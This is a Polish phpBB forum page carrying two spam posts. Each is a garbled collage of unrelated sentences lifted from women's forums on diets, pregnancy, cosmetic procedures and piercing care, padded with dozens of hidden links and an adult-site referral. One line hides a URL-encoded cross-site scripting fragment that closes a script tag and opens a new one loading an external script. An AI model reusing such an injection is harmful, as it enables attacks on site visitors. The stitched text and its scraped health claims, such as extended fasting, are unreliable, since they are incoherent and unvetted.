Forum www.4t.fora.pl Strona G│ˇwna
Zaloguj Rejestracja Profil Zaloguj siŕ, by sprawdziŠ wiadomoÂci FAQ Szukaj U┐ytkownicy Grupy
pozdrawiam

 
Napisz nowy temat   Odpowiedz do tematu    Forum www.4t.fora.pl Strona G│ˇwna -> Regulamin
Zobacz poprzedni temat :: Zobacz nastŕpny temat  
Autor WiadomoŠ
Juukla




Do│▒czy│: 24 Sty 2014
Posty: 716
Przeczyta│: 0 tematˇw

Ostrze┐e˝: 0/5
Sk▒d: Finland

PostWys│any: Sob 14:49, 05 Kwi 2014    Temat postu: pozdrawiam

Kuleczka kt├│r─ů utworzysz nie powinna by─ç zbyt mokra, tzn.
[link widoczny dla zalogowanych]
Ja na prawd─Ö nie chc─Ö. do pietrucha -to nie Rembrands?
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Mocna ketoze bez paskow mozna poznac po duzym zmuleniu- ja mam taka sennosc. [link widoczny dla zalogowanych] Mogę jedynie powiedzieć, że mam bardzo ładne wcięcie w talii, ale dla mnie.
czy je┼Ťli za pierwszym razem powi─Öksz─Ö sobie usta 0,8 ml kwasu to b─Ödzie naturalny efekt? st─ůd te md┼éo┼Ťci po ─çwieczeniach i napady senno┼Ťci. Jeden i drugi ma podobno bardzo du┼╝o pacjentek.....a mo┼╝e si─Ö orientujecie ile trzeba u nich czeka─ç na zabieg ??? W niedziel─Ö rano odesz┼éy mi wody wi─Öc si─Ö spakowa┼éam, m─ů┼╝ zadzwoni┼é do mojego lekarza i powiedzia┼é mu, ┼╝e ja bez niego do szpitala nie jad─Ö i koniec.Wi─Öc m├│j lekarz zaproponowa┼é ┼╝eby┼Ťmy po drodze do szpitala po niego wjechali, na miejscu okaza┼éo si─Ö, ┼╝e Pan gin jest deczko nie taki jak by powinien bo jest po weselu. i czy nie wyglada np to zle ze masz nienaturalna roznice w dlugosci n├│g i tu┼éowia? [link widoczny dla zalogowanych]
Dorotko! Niestety nie pamiętam nazwy preparatu. Hej!!! byłam w kiss paris i sama nie wiem [link widoczny dla zalogowanych] F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%6 9%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74 Polecam. Chyba nie o kalorie chodzi teraz zrobie znow 4 dni, ale ogranicze sie do tego co napisano na stronie o glodowce, chleb razowy, warzywa itp..
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

heh a tribiotik to serio super masc kup sobie!!i przemywaj sobie z 2 3 razy dziennie spirytusem i smaruj ta mascia jak bedzies zzmiala ze 2 razy rano i wieczor;p pozdroo
[link widoczny dla zalogowanych]
Przysz┼éam na wizyte dentystka stwierdzi┼éa, ┼╝e to ten pierwszy promieniuje, a boli mo┼╝e dlatego, ze mam tam jak─ů┼Ť bakteri─Ö (?) w┼éo┼╝y┼éa mi wiec do kana┼é├│w jakis ┼Ťrodek przeciwbakteryjny i tak jak wiele razy wczesniej powiedziala mam nadzieje, ze przestanie bolec.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych] albo inn─ů tego typu (ja akurat
[link widoczny dla zalogowanych]

i ten doktorek taki nadety i nienaturalny [link widoczny dla zalogowanych] zenujace!!!
Na szcz─Ö┼Ťcie wszystkie moje znajome dobrze znosi┼éy porody w bia┼éostockich szpitalach, bardziej s─ů zadowolone z warszawskiej (je┼Ťli maj─ů por├│wnanie)ale na szcz─Ö┼Ťcie ┼╝adna mnie nie straszy. Sooorrrrrrryyyyy dziewczyny!!! a co to jest ten intership?? Nie zrobisz zdrowego, ale zrobisz niepijacego. Naprawde nikt? [link widoczny dla zalogowanych]
http://www.womiss.fora.pl/viewtopic.php?t=196 &sid=f334c6f259a0851579b47f80f6477447 Monaa, gratuluje Ci wyboru! Badania nasze s─ů ok. co trzeba jes─ç hej bankierka moj meil- [link widoczny dla zalogowanych] Wiec jeszcze raz napisze szukam piosenki gdzie na poczatku tak jak by cos sie potyklo cos szklanego czekam no odpowiedzi zgory dziekuje Czy mo┼╝e mi kto┼Ť powiedzie─ç gdzie teraz pracuje Pani Basia z Pure Diamond????
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

krysysy oczywiscie przychodza - najczesciej podczas drugiej serii.
[link widoczny dla zalogowanych]
bo mo┼╝e to doprowadzi─ç do nawrotu choroby - nale┼╝y przyj─ů─ç ca┼é─ů dawk─Ö). Kiedy┼Ť by┼éam w instytucie lavender na Ptasiej w Warszawie [link widoczny dla zalogowanych] , robi┼éam tam mikrodermabrazj─Ö korundow─ů.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Wiec tym samym obala mit o kolejnym tureckim podrywaczu, kt├│ry ma 10tys lasek.. [link widoczny dla zalogowanych] Martwimy si─Ö o Ciebie?????
Ja nosz─Ö 44 i bardzo bardzo chcia┼éabym w ko┼äcu w┼éo┼╝y─ç na swoje n├│┼╝ki pi─Ökne kobiece butki! Od czego powstaje torbiel...? A u nas od godziny leje. Moj X jeszcze tego listu nie wyslal (albo zrobil to ale o tym nie wiem). to fakt sa biura tylko, ┼╝e zwykle ta przyjemno┼Ťc kosztuja ok 3000-4500 czasem + bilety na samolot, promesa wizowa, itp [link widoczny dla zalogowanych]
Hej, by┼éam tam sprawdzi┼éam REWELACYJNE STUDIO!!!Wszystko najlepszej jako┼Ťci profesjonalnie i niedrogo! ja te┼╝ zawsze rycz─Ö jak widz─Ö pomykaj─ůcego giganta i nie tylko (mo┼╝e by─ç nawet malutki gigancik) na wstr─Ötnych ow┼éosionych ┼éapskach, rycz─Ö jak szalone i wali mi serce!!! Kto┼Ť tu wczesniej podawa┼éa stron─Ö o uniewa┼╝nieniach ko┼Ťcilenych [link widoczny dla zalogowanych] a na beautyforyou.skle [link widoczny dla zalogowanych] - dla handlowca moze by─ç nawet jab┼éko, cokolwiek ... A poza tym on jeszcze zaakceptowa┼é jej dzicko z poprzedniego zwi─ůzku to te┼╝ co┼Ť znaczy.Da si─Ö sprawdzi─ç jako┼Ť medycznie czy kto┼Ť jest seksoholikiem????????? wierze ,┼╝e mi sie uda bo marzenia s─ů ┼╝eby je realizowa─ç..dzi─Öki za wszystko co piszecie -to tak wiele znaczy moja blizna ma 7 cm;(((( ale MUSI SIE UDA─ç
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

nie m├│wi─Ö , bo mam znajom─ů , kt├│ra za Francuza wysz┼éa i nazywa si─Ö de Lorme
[link widoczny dla zalogowanych]
Grodzka UCIEKAJCIE Z DALEKA!!!!! ale dzisiaj jest 4 dziec i zaczelam plamic krwaia...
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Zaproponowa┼éa mi leczenie po ci─ů┼╝y (staramy si─Ö z m─Ö┼╝em), chyba, ┼╝e b─Öd─ů problemy z zaj┼Ťciem. [link widoczny dla zalogowanych] Zielonaa xD sadze ze to dobry pomys┼é bo w koncu nie na darmo harowalas nie?;d a co do zrobie nia kolczyczq to nie mash sie co zastanawiac bo to super rzecz..buziooolki:*:*
>ponczoszanka , ja te┼╝ ┼╝yga┼éam ( tak czas przesz┼éy - optymistka ze mnie) gdy mia┼éam do┼éa , albo ┼╝yga┼éam BO mia┼éam do┼éa. Dziewczyny kpina to ma┼éo powiedziane Tez mam krecone ostatnio kupilam sobie odrzywke i szampon Nivea i musze powiedziec ze widze efekty. Kwas mlekowy w pochwie uniemo┼╝liwia rozw├│j niepo┼╝─ůdanej flory bakteryjnej. A z alko jak ktos lubi wino blossom hill cabernet 0,3 wegla w 100 ml. [link widoczny dla zalogowanych]
no i chyba wypije te┼╝ ma┼éa kawk─Ö, taka z p┼éaskiej ┼éy┼╝eczki rozpuszczalki. z ty┼éu natomiast s─ů to takie malute┼äskie spr─Ö┼╝ynki kt├│re bardzo si─Ö pusz─ů a w dodatku podnosz─ů ku g├│rze. do┼Ťwiadczona ju┼╝ jestem wi─Öc dzisiejszy m├│j zabieg profesjonalnie przebiega┼é dwa takie worki we mnie wchodz─ů, i ju┼╝ si─Ö nauczy┼éam jak dobrze si─Ö rusza─ç ┼╝eby mnie woda dobrze wyp┼éuka┼éa jak z siebie wylewam to wszystko to musz─Ö wsta─ç porusza─ç si─Ö i jeszcze raz usi─ů┼Ť─ç w wc, na koniec zawsze jest siku wszystko powtarzam, ale za drugim razem to w┼éa┼Ťciwie ju┼╝ tylko czysta woda ze mnie wylatuje, wi─Öc nie wiem czy to potrzebnie robi─Ö, przynajmniej mam uczucie lekko┼Ťci i wyj─ůtkowej czysto┼Ťci po takiej serii nie wiem czy to moje nastawienie do tego i ch─Ö─ç zrzucania kilogram├│w czy same zabiegi, ale chyba mi to poprawia nastr├│j dajcie dalej jak fajnie... Przerazi┼éam si─Ö ale poczekalam co m─ůdrala zrobi. Niestety na NFZ, nawet do g┼éowy mi nie przysz┼éo, ┼╝eb y p├│j┼Ť─ç prywatnie.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
http://www.skins.be/wallpaper/beyonce-knowles /3949/1024x768/
[link widoczny dla zalogowanych]


Post zosta│ pochwalony 0 razy
Powrˇt do gˇry
Zobacz profil autora
Juukla




Do│▒czy│: 24 Sty 2014
Posty: 716
Przeczyta│: 0 tematˇw

Ostrze┐e˝: 0/5
Sk▒d: Finland

PostWys│any: Sob 14:51, 05 Kwi 2014    Temat postu: Ludzie w autobusie ustepuja mi miejsca................

Ja te┼╝ par─Ö lat temu to prze┼╝ywa┼éam, ale zabrak┼éo mi ┼Ťmia┼éo┼Ťci nawet ┼╝eby pogada─ç, a nie mia┼éam nawet takiej okazji jak Ulla , ┼╝e by┼é u mnie po kol─Ödzie !!!
[link widoczny dla zalogowanych]
Sama juz zauważyłam że podczas ograniczenia pokarmu do samych owoców i warzyw albo do wody- niestety mam objawy niedoboru witamin z grupy B. no ja nie moge sie doczekać jutra:
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

najlepiej dziala na nie deszcz - a mżawka to juz wogole wtedy wszystkie dziewczyny płacza a ja mam kręcioły na glowie ;D [link widoczny dla zalogowanych] Tak Sforo, zgadzam się z każdym słowem.
Hmmm.... ... pozdr├│wka dla wszystkich forumowicz├│w Odera┼éam wyniki ciazy brak a dzi┼Ť 46dzie┼ä cyklu mam ju┼╝ tego do┼Ť─ç jedyny plus prolaktyna si─Ö unormowa┼éa Stoj─Ö na 75 kg. [link widoczny dla zalogowanych]
U nas taka sama pogoda, niby s┼éo┼äce ┼Ťwieci i te 25 stopni mo┼╝e i jest, ale wieje taki wiatr, ┼╝e temperatura nie jest wcale odczuwalna i moje dzieci dzi┼Ť na d┼éugi r─Ökaw chodz─ů. bo nie wiem? idiot├│w nie brakuje! Zacz─Ö┼éam naciskac na to miejsce i czu┼éam co┼Ť twardego pod spodem... Jestem 7 tygodni po zabiegu, mia┼éam robiony w Rzeszowie - cewnika nie zak┼éadali, lewatywy nie robili, ale do zabiegu by┼éam ca┼ékiem nago, tyle, ┼╝e ubrali mnie w bia┼é─ů koszulk─Ö rozpi─Öta do do┼éu na plecach.... .Na pocieszenie nie ma polo┼╝nictwa zaocznego -chyba ┼╝e pomost├│wka .. zreszta masz racje,Polacy nei maja powodzenia,wyjatkowo nieprzystojni jestesmy,
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

wiekowo to my chyba jeste┼Ťmy podobne.
[link widoczny dla zalogowanych]
Masz znajomych z Polski?
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Tak si─Ö zastanawiam, jak Ci pom├│c...?
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Witajcie. [link widoczny dla zalogowanych] Wejd┼║ na sexycity.pl/polecam/894
babka ponad 90kg - 20 co┼Ť to tak PS. i na slubach co 2 czy co 3 kobieta w takiej wystepuje U mnie to w zasadzie nawet nie mo┼╝na nazwa─ç tego nieregularnymi miesi─ůczkami, bo one po prostu wyst─Öpowa┼éy sobie jak chcia┼éy, a do tego by┼éam i zreszt─ů nadal jestem strasznie nerwowa. U mnie byla przyjaciolka, szkoda ze tylko kilka dni Przez chwile poczulam sie jak w Polsce i wreszcie moglam swobodnie poplotkowac we wlasnym jezyku nad kubkiem herbaty. [link widoczny dla zalogowanych]
Aga, m├│wimy o masturbacji podczas okresu, nie o seksie z partnerem. boje sie tego chirurga strasznie i jestem malo odporna na bol juz nie wiem jak sobie pomoc... Mam bardzo waskie usta i myslalam ze nawet po takiej dawce bedzie widac roznice. A ona w┼éa┼Ťnie ma silikony... Schering AG Niemcy To jest wst─Öp do ┼╝ycia be┼╝ w─Öglowodan├│w prostych. Za to znalaz┼éam co┼Ť co mo┼╝e by─ç dla Was interesuj─ůce a mianowicie co mo┼╝e si─Ö sta─ç z organizmem po takiej g┼éod├│wce.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
chyba ┼╝e chcecie bez polskich liter?
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

potrzebne sa akty urodzenia obu partnerow, plus ewentualne zaswiadczenia o rozwodzie jesli takowy byl...
[link widoczny dla zalogowanych]
Przechodz─Ö na diet─Ö - b─Öd─Ö pi─ç soki i je┼Ť─ç sa┼éat─Ö
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Witam Wszystkich, [link widoczny dla zalogowanych] Gdy ju┼╝ przela┼ée┼Ť 5z┼é na konto znajduj─ůce si─Ö na 1.
M├│j DRUGI dzie┼ä. Chce kto┼Ť winogronka?banany i inne?,┼éadne s─ů Hej dziewczyny jak si─Ö czujecie? mam w tej chwili 35 lat rozstali┼Ťmy si─Ö 3 lata temu pisalem juz kilka razy ze na wyniki trzeba patra─ç ca┼éosciowo - w porownaniu z normami danego laboratorium -ka┼╝de ma w┼éasne zale┼╝ne od metody bada┼ä. [link widoczny dla zalogowanych]
ma komouter w domu ale go likwiduja, nie bedzie neta w domu. i odpu┼Ťci┼éem nie poszed┼éem do kosmetyczki ani nigdzie;/ teraz nie mog─Ö go dotkn─ů─ç .wygl─ůda tak jak by si─Ö paznokie─ç zawin─ů┼é z boku i wr├│s┼é pod paznokiec;/ 1 seler2 ┼éy┼╝ki kwa┼Ťnej ┼Ťmietany To co mam z nim zrobi─ç??? Jakby┼Ť troch─Ö poczyta┼éa forum to dowiedzia┼éaby┼Ť si─Ö ┼╝e jestem piercerk─ů a raczej ucz─Ö si─Ö od 4 lat i tyle razy by┼éo to┼ékowane na tym forum ┼╝e tribiotic woda utleniona i spirytus to z┼éo ┼╝e mam czasem ju┼╝ do┼Ť─ç ; S┼éysza┼éam ┼╝e robi─ů ┼éadne koczki... hahah lyso ci no nie
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Mój naturalny kolor włosów to ciemny blond.
[link widoczny dla zalogowanych]
witam cie┼╝aroweczki!! Znam te┼╝ lekarzy i piel─Ögniarki tam pracuj─ůce, a broni─ůce si─Ö r─Ökami i nogami przed porodem w tych szpitalach i decyduj─ůce si─Ö na prywatn─ů klinik─Ö.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

anna przybylska [link widoczny dla zalogowanych] Pi─ç mo┼╝na tylko nie s┼éodzone soki owocowe i niegazowan─ů wod─Ö mineraln─ů.
Mimo, ┼╝e strona przeznaczona jest dla kobiet, to wydaje mi si─Ö, ┼╝e dla m─Ö┼╝czyzn te┼╝ jest ciekawa, bo ujawnia to o czym kobiety czasami boj─ů si─Ö rozmawia─ç z parterem by nie wyj┼Ť─ç na zboczon─ů. Ktos chyba w g├│rze nade mn─ů czuwa zebym nie zdj─Öla aparatu za szybko Okaza┼éo sie, ze miejsce w szpitalu jest dopiero na 13 maja, wiec jeszcze 3 tygodnie z hakiem zamiast 2 Troszke mi szkoda, bo wesele kuzynki przesiedze w takim razie, ale moze moja kosc bedzie mocniejsza troszke Co ze mnie wylecia┼éo to sam nie wiem, ale by┼éo to obrzydliwe!!! i czego mam si─Ö spodziewa─ç?? Pozdrawiam wszystkich serdecznie! [link widoczny dla zalogowanych]
Ja na kursie strzygam moze 1 czy 2 m─Ö┼╝czyzn a inni nie robil tego w og├│le. Witam dziewczyny na pewno b─Ödzie Ci dobrze w tych kolorach [link widoczny dla zalogowanych] Nie wiem czy badania hormonalne to jest pewnik, ale w przypadku ryzyka raka szyjki macicy warto zrobi─ç sobie badanie kolkoskopie kt├│ra jest bardzo dok┼éadne i wyprzedzaj─ůca zagro┼╝enie i tutaj wspomniany par─Ö post├│w wyzej dr ┼Üwidrak z Komandorskiej jest wart polecenia, bo robi te badanie To nieprawda, ┼╝e trzeba bra─ç morfin─Ö. po pierwsze, jest bardzo duzo polakow i nie tylko polakow i wcale nie jest latwo znalezc prace.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]


Post zosta│ pochwalony 0 razy
Powrˇt do gˇry
Zobacz profil autora
WyÂwietl posty z ostatnich:   
Napisz nowy temat   Odpowiedz do tematu    Forum www.4t.fora.pl Strona G│ˇwna -> Regulamin Wszystkie czasy w strefie GMT
Strona 1 z 1

 
Skocz do:  
Mo┐esz pisaŠ nowe tematy
Mo┐esz odpowiadaŠ w tematach
Nie mo┐esz zmieniaŠ swoich postˇw
Nie mo┐esz usuwaŠ swoich postˇw
Nie mo┐esz g│osowaŠ w ankietach


fora.pl - za│ˇ┐ w│asne forum dyskusyjne za darmo
Powered by phpBB © 2001, 2002 phpBB Group, Theme by GhostNr1